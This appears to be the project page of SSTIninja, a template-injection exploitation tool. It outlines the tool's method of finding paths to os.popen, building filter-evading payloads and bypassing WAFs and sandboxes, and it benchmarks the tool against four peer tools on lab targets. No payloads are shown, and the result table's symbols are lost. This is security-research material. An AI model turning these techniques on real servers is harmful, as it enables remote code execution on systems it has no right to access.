SSTIninja

A constraint-aware Server-Side Template Injection exploitation tool — empirically benchmarked against 4 peer tools across 10 vulnerable targets.

Abstract

SSTIninja treats template-injection exploitation as a search problem: a Searcher walks the live Python object graph from a seed value to a callable target (e.g. os.popen), producing an abstract path; a Renderer then turns that path into a payload string under arbitrary syntactic constraints (forbidden chars, banned keywords, length budgets, hardened sandboxes). The two are orthogonal components, allowing payload-shape obfuscation without re-doing search.

The HTTP front-end then probes a remote target — fingerprinting the template engine via boundary-marked math probes, mapping forbidden tokens via differential reflection, optionally enumerating __subclasses__() remotely — then composes a constraint-aware exploit and verifies it via a random sentinel echoed back through the response.

Headline result

On the 9-target local_flask benchmark — covering bare Jinja2, multiple sandbox configurations, a WAF-style filter, two non-Jinja2 engines (Mako, Tornado), and two negative cases — SSTIninja is the only tool to score 100% on detection, exploitation, and WAF/sandbox bypass simultaneously, while running 3–100× faster than other detect+RCE peers.

Per-target results

Each row is one HTTP target; each column is one tool's verdict. ✓/✓ = detected and exploited; ✓/✗ = detected but no RCE.

Local Flask (9 targets)

Target Engine (exp) ourssstimaptplmapnucleitinja
flask_jinja2_baseline jinja2 / / / / /
flask_jinja2_loose_sandbox jinja2 / / / / /
flask_jinja2_narrow_blacklist jinja2 / / / / /
flask_jinja2_waf jinja2 / / / / /
flask_mako mako / / / / /
flask_tornado tornado / / / / /
flask_jinja2_strict_sandbox jinja2 / / / / /
flask_no_template_eval / / / / /
flask_safe_jinja2 / / / / /

Cells: <detected>/<exploited>. The engine each tool actually reported is available on hover; aggregate engine identification accuracy is in the dimensional summary below.

vulhub flask/ssti (1 target)

Target Engine (exp) ourssstimaptplmapnucleitinja
vulhub_flask_ssti jinja2 / / / / /

Cells: <detected>/<exploited>. The engine each tool actually reported is available on hover; aggregate engine identification accuracy is in the dimensional summary below.

Dimensional analysis

Aggregated over the full 10-target corpus. ours the tool from this repo. detect+rce tools that do detection and exploitation. detect_only detection-only tools (signature scanners / academic analyzers); their exploitation rate is N/A by design, not a defeat.

Detection rate (true positives)

Fraction of targets with known SSTI that the tool flagged.

Tool Class Rate Count
ours ours 100% 8/8
sstimap detect+rce 100% 8/8
tplmap detect+rce 100% 8/8
nuclei detect+only 100% 8/8
tinja detect+only 100% 8/8

False positive rate

Fraction of non-vulnerable targets the tool incorrectly flagged. Lower is better.

Tool Class Rate Count
ours ours 0% 0/2
sstimap detect+rce 0% 0/2
tplmap detect+rce 0% 0/2
nuclei detect+only 0% 0/2
tinja detect+only 0% 0/2

Exploitation rate (RCE confirmed)

Fraction of exploit-expected targets where a sentinel was actually echoed by the target.

Tool Class Rate Count
ours ours 100% 7/7
sstimap detect+rce 71% 5/7
tplmap detect+rce 71% 5/7
nuclei detect+only 0% 0/7
tinja detect+only 0% 0/7

WAF / weakened-sandbox bypass

Subset rate on hardened targets — WAF, narrow-blacklist, or loose-sandbox endpoints.

Tool Class Rate Count
ours ours 100% 3/3
sstimap detect+rce 67% 2/3
tplmap detect+rce 33% 1/3
nuclei detect+only 0% 0/3
tinja detect+only 0% 0/3

Engine identification specificity

Targets where the tool emitted the correct engine label (jinja2 / mako / tornado) instead of a generic catch-all.

Tool Class Rate Count
ours ours 100% 8/8
tplmap detect+rce 100% 8/8
tinja detect+only 100% 8/8
sstimap detect+rce 75% 6/8
nuclei detect+only 0% 0/8

Mean wall time per target

Tool Class Mean Total Targets
ours ours 0.09s 0.9s 10
tinja detect+only 0.04s 0.4s 10
tplmap detect+rce 0.23s 2.3s 10
sstimap detect+rce 1.02s 10.2s 10
nuclei detect+only 7.98s 79.8s 10

Peer tools

Versions captured at run time and committed alongside the JSONL records, so every comparison is fully reproducible.

Methodology

Each (target × tool) pair is a single subprocess run with timeout. Detection is judged from each tool's own success-confirmation output; exploitation is confirmed only by sentinel-in-response (no claim is taken at the tool's word). The full corpus, expected outcomes, and tool adapters are versioned in eval/corpus/, src/sstininja/eval/peers/; the raw per-(target, tool) records this site reads from are in eval/results/*.jsonl.

Honest limitations